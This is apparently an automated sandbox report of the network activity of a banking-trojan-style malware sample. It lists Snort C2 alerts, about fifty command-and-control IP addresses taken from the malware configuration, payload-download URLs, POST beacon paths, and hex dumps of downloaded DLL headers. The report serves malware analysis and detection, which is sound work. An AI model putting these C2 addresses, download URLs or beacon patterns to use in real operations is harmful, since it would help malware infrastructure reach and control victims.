Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49703 -> 81.68.152.197:80

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 45.63.99.23 7080
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 173.255.211.88 443
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 182.162.143.56 443

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:63177 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49705 -> 173.255.211.88:443
Source: Traffic	Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.3:49709 -> 45.63.99.23:7080
Source: Traffic	Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.3:49712 -> 182.162.143.56:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 173.255.211.88:443
Source: Malware configuration extractor	IPs: 45.63.99.23:7080
Source: Malware configuration extractor	IPs: 182.162.143.56:443
Source: Malware configuration extractor	IPs: 91.187.140.35:8080
Source: Malware configuration extractor	IPs: 212.24.98.99:8080
Source: Malware configuration extractor	IPs: 119.59.103.152:8080
Source: Malware configuration extractor	IPs: 45.235.8.30:8080
Source: Malware configuration extractor	IPs: 172.104.251.154:8080
Source: Malware configuration extractor	IPs: 72.15.201.15:8080
Source: Malware configuration extractor	IPs: 169.57.156.166:8080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 213.239.212.5:443
Source: Malware configuration extractor	IPs: 164.90.222.65:443
Source: Malware configuration extractor	IPs: 201.94.166.162:443
Source: Malware configuration extractor	IPs: 94.23.45.86:4143
Source: Malware configuration extractor	IPs: 183.111.227.137:8080
Source: Malware configuration extractor	IPs: 186.194.240.217:443
Source: Malware configuration extractor	IPs: 107.170.39.149:8080
Source: Malware configuration extractor	IPs: 147.139.166.154:8080
Source: Malware configuration extractor	IPs: 5.135.159.50:443
Source: Malware configuration extractor	IPs: 206.189.28.199:8080
Source: Malware configuration extractor	IPs: 104.168.155.143:8080
Source: Malware configuration extractor	IPs: 129.232.188.93:443
Source: Malware configuration extractor	IPs: 82.223.21.224:8080
Source: Malware configuration extractor	IPs: 103.43.75.120:443
Source: Malware configuration extractor	IPs: 103.132.242.26:8080
Source: Malware configuration extractor	IPs: 139.59.56.73:8080
Source: Malware configuration extractor	IPs: 164.68.99.3:8080
Source: Malware configuration extractor	IPs: 202.129.205.3:8080
Source: Malware configuration extractor	IPs: 167.172.199.165:8080
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 209.97.163.214:443
Source: Malware configuration extractor	IPs: 167.172.253.162:8080
Source: Malware configuration extractor	IPs: 1.234.2.232:8080
Source: Malware configuration extractor	IPs: 159.65.88.10:8080
Source: Malware configuration extractor	IPs: 95.217.221.146:8080
Source: Malware configuration extractor	IPs: 153.92.5.27:8080
Source: Malware configuration extractor	IPs: 91.207.28.33:8080
Source: Malware configuration extractor	IPs: 188.44.20.25:443
Source: Malware configuration extractor	IPs: 153.126.146.25:7080
Source: Malware configuration extractor	IPs: 163.44.196.120:8080
Source: Malware configuration extractor	IPs: 172.105.226.75:8080
Source: Malware configuration extractor	IPs: 115.68.227.76:8080
Source: Malware configuration extractor	IPs: 159.65.140.115:443
Source: Malware configuration extractor	IPs: 139.59.126.41:443
Source: Malware configuration extractor	IPs: 197.242.150.244:8080
Source: Malware configuration extractor	IPs: 45.176.232.124:443
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 149.56.131.28:8080
Source: Malware configuration extractor	IPs: 79.137.35.198:8080
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 160.16.142.56:8080
Source: Malware configuration extractor	IPs: 159.89.202.34:443
Source: Malware configuration extractor	IPs: 185.4.135.165:8080

Source: Joe Sandbox View	ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
Source: Joe Sandbox View	ASN Name: INPL-IN-APIshansNetworkIN INPL-IN-APIshansNetworkIN

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3

Source: global traffic	HTTP traffic detected: POST /tkafmhcgcid/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 284Host: 182.162.143.56
Source: global traffic	HTTP traffic detected: POST /qqvehgyxm/bitss/ktcpnaio/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 304Host: 182.162.143.56

Source: Joe Sandbox View	IP Address: 110.232.117.186 110.232.117.186
Source: Joe Sandbox View	IP Address: 103.132.242.26 103.132.242.26

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Nov 2022 18:26:51 GMTContent-Type: application/x-msdownloadContent-Length: 433152Connection: keep-aliveX-Powered-By: PHP/7.1.5Set-Cookie: 637136ebdcf92=1668364011; expires=Sun, 13-Nov-2022 18:27:51 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Sun, 13 Nov 2022 18:26:51 GMTExpires: Sun, 13 Nov 2022 18:26:51 GMTContent-Disposition: attachment; filename="EvvmhfKiKFhKrSuHfBq.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1c 29 6d 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 02 02 00 00 96 04 00 00 00 00 00 dc 5b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 06 00 00 04 00 00 a7 e4 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 67 06 00 57 00 00 00 b4 5c 06 00 64 00 00 00 00 d0 06 00 54 02 00 00 00 a0 06 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 01 02 00 00 10 00 00 00 02 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c7 47 04 00 00 20 02 00 00 48 04 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2f 00 00 00 70 06 00 00 1c 00 00 00 4e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c4 1a 00 00 00 a0 06 00 00 1c 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 74 65 78 74 00 00 00 00 1d 09 00 00 00 c0 06 00 00 0a 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 2e 72 73 72 63 00 00 00 54 02 00 00 00 d0 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?lllllll/ll2ll"l
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Nov 2022 18:27:03 GMTContent-Type: application/x-msdownloadContent-Length: 433152Connection: keep-aliveSet-Cookie: 637136f7d44c4=1668364023; expires=Sun, 13-Nov-2022 18:28:03 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Sun, 13 Nov 2022 18:27:03 GMTExpires: Sun, 13 Nov 2022 18:27:03 GMTContent-Disposition: attachment; filename="2yXcjy57oZTTUNweDidCGUY.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1c 29 6d 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 02 02 00 00 96 04 00 00 00 00 00 dc 5b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 06 00 00 04 00 00 a7 e4 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 67 06 00 57 00 00 00 b4 5c 06 00 64 00 00 00 00 d0 06 00 54 02 00 00 00 a0 06 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 01 02 00 00 10 00 00 00 02 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c7 47 04 00 00 20 02 00 00 48 04 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2f 00 00 00 70 06 00 00 1c 00 00 00 4e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c4 1a 00 00 00 a0 06 00 00 1c 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 74 65 78 74 00 00 00 00 1d 09 00 00 00 c0 06 00 00 0a 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 2e 72 73 72 63 00 00 00 54 02 00 00 00 d0 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f6 07 00 00 00 e0 06 00 00 08 00 00 00 94 06 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?ll

Source: global traffic	HTTP traffic detected: GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: datie-tw.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-bin/WFFcGx/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: copunupo.ac.zmConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /upload/VaOfWEb3pW76UO/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sbm.xinmoshiwang.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/4cChao/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ly.yjlianyi.topConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.3:49709 -> 45.63.99.23:7080

Source: unknown

Network traffic detected: IP country count 24

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 13 Nov 2022 18:26:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33

Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: regsvr32.exe, 0000000A.00000003.2012430306.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2065411138.0000000000A55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: regsvr32.exe, 0000000A.00000003.2012430306.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2065411138.0000000000A55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416327091.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012998285.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/
Source: regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066014930.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2415143218.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/
Source: regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F
Source: regsvr32.exe, 0000000A.00000003.2012257870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012973980.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012356542.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416244353.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416063327.0000000000C34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012912551.0000000000C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/tkafmhcgcid/
